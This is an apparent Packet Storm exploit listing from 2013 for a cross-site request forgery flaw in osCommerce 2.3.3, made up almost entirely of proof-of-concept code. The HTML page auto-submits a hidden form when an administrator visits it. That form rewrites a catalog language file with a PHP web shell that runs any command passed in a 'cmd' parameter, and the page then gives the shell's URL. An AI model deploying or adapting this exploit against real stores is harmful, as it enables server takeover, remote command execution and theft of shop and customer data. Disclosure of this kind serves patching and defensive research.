osCommerce 2.3.3 Cross Site Request Forgery

2013-02-12T00:00:00
ID PACKETSTORM:120223
Type packetstorm
Reporter Jakub Galczyk
Modified 2013-02-12T00:00:00

Description

                                        
                                            `<?php  
/*  
* this is simple proof-of-c0ncept for csrf in latest  
osCommerce (2.3.3).  
*  
* Admin, after visiting this page, will add php-shell-code to file:  
* ./catalog/includes/languages/english/download.php, so now if we  
* add 'cmd' param to this file, our 'shell' will print command output.  
*  
* --- there should be more this kind of bugs in this webapp.  
* 22.o1.2o13 o/  
*/  
?>  
  
<html><body onload="document.runCSRF.submit();">  
<form method="post" name="runCSRF"  
action="http://oscommerce-2.3.3/catalog/admin/define_language.php?lngdir=english&filename=english/download.php&action=save">  
<input type="hidden" name="file_contents"  
value="<?php $cmd = $_GET['cmd']&#x3b; echo '<pre>' . shell_exec($cmd) . '</pre>'&#x3b; ?>">  
  
</form>your shell should be here:  
catalog/includes/languages/english/download.php?cmd=id<br></body></html>  
`